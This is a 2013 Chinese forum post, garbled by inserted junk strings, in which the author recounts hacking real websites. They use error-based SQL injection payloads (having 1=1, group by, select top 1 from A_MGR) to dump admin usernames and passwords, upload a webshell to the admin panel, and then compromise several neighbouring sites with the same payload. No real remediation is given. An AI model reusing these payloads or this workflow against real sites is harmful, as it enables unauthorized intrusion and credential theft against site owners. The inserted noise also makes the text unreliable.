发现一个注入点& e5 m8 k G! P r
http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389 ]) D. k6 K( e0 |0 A1 {+ V
+ T. l& s# _9 J+ o. A习惯性的加’having1=1--
3 i) j+ d" ~& E6 I0 v' w) \' I$ E. b' \# b! D' i0 d
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
$ m( y+ B8 s" T4 b8 i% o- y4 |$ M2 j. g& _' v4 o
0" U1 P7 }- g( B3 r! I8 ? T9 b
3 A& d- @) g) z- b爆出Diary_A.dl_Title(这时候很激动啊)
2 a$ |6 [" E1 v4 G; s% k% a& w0 T7 r* p ^6 H' I" y' Z6 o* W
那么继续
0 U* |' D, g( y% I$ i, M' c: rhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
! p9 y9 r$ ^$ {: x. W/ h# v0 s) n+ [
继续,一直爆下去* I& {3 X- Z+ e' L, g; O
1 l9 H; ~: i' l4 x% g# m! Y
爆到几个字段和表段 但是没找到需要的管理用户的字段
& {4 \. o; t- @# J* u# E% H$ x2 V1 V9 k6 F% t6 Q/ ?! n/ H
蛋疼了 怎么办 然后去后台登陆页看源码0 z# [: [# {# M2 t
$ i& p, d( g0 A1 {+ E) B5 N, N4 m+ F0
* S2 Q- V' l1 ~' f2 G( e0 ~ Q' ~) @) h
Input name= “ADUID”) I% }/ ^2 a4 w
Input name= “ADPWD”
1 o2 N& H) l" n, Q% S5 S
6 O# d7 k) L. P很幸运 找到了字段那就继续. [# L* o4 n7 b
找到之后开始爆用户
( |8 d' r7 w! w3 Khttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—3 a/ z9 s( l) Z9 @
爆密码# t8 Q: a$ [* U/ p' [/ y( D
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—
) M3 y) T& u" S9 x2 r测试了下 这个注入点只能爆到文章哪里的表 $ g, g3 v7 Z) j% y% w0 h1 y7 F
) H' u; z! Y3 W) b* \2 l# `头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
h+ O- D8 w) s9 S
0 o/ u5 B' t, X5 g" Y; D又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
" U+ v6 [- P& Q, R- }8 x# K3 n; F2 V/ q, D% W m% v+ G
473* I/ |* m% G; B! t2 N- |! x/ I8 h
; V! X3 M0 E' @! J2 ?# D% ?进后台
; I! J3 i2 v# P/ A
( j7 [5 P H. _, |/ _
0 [' ?4 p2 ~# ?发现几个上传点 有的地方不能上传 而且防止恶意代码7 H% b0 ]- [, _4 V
5 V' |7 h% L. R) ?) ~
没办法 各种百度各种找大牛 找到一只好像可以突破的马% r' S8 o' n6 |2 |, Q
k+ L9 d( [; y) B0 ~. g
' l) y1 j! L. R( n# J& ]: I在系统管理那里直接上传 不过没有显示地址3 Z9 {' p H% H( H5 ?# h
2 w. w- |: a8 i# N _再上传一次 抓包 搞定OK
/ R2 h( N/ [( u5 ^& s
" P5 Y1 V( |9 w F/ E: n; [3 T- x" k0 U( ?& }7 l' ^: K: c
2 l& V5 S7 K. d- m! O$ Z; T, x
472
0 U# C0 s% m& S; b9 f5 b! D; j
7 u0 B; z) ]& P* L9 [3 |! k晚上不行了 去睡觉。。。
2 j2 q. h5 D! {$ X第二天刚起床 闲的没事做继续日站吧 7 `, y' u, v2 }& y- k
/ q/ C- O" f- m( y找个站 就把这个站的旁c扫了下% C7 z, O( a( n3 F
% I4 m% Q+ F& u& t! L0 }3 T
发现c段也有一个购物站 ,然后还和这个站的模板差不多
% D2 T! t* v/ b6 _: r* q0 V8 W: _( D+ _
就找到会员登录口测试
3 P8 Y4 Q3 [6 S6 _9 R! x! o9 h
/ _1 K6 O( b, B" W1 R3 b" y'and (select top 1 MGR_UID from A_MGR)>0—# U6 ^$ Y# J0 \* p
果断爆到了 这时候我很激动 通杀
- o' F( T9 \$ C- d( v, d4 |3 o( |' f5 q9 G
再次翻c段* c# m( B7 T g5 |
6 ^0 B1 y1 b3 k+ A翻出几个站 都成功拿下; P7 [; p+ `4 F1 B7 f5 v
, J q- @$ d- h) W! m6 d x( R2 K
7 f' u# Y$ c5 [ H7 O) l
修复方案:
5 o6 e. G) g7 w" K# }6 O& L' Y他们比我专业 * J N1 J6 I1 b8 c) K4 q
6 M2 Z. W8 U# B- q4 p, D1 L$ X
' @" G1 }! x- d% N8 N( Y$ Y
9 ` B+ D* x1 V- o |
发表于 2013-4-4 17:40:38
收藏
支持
反对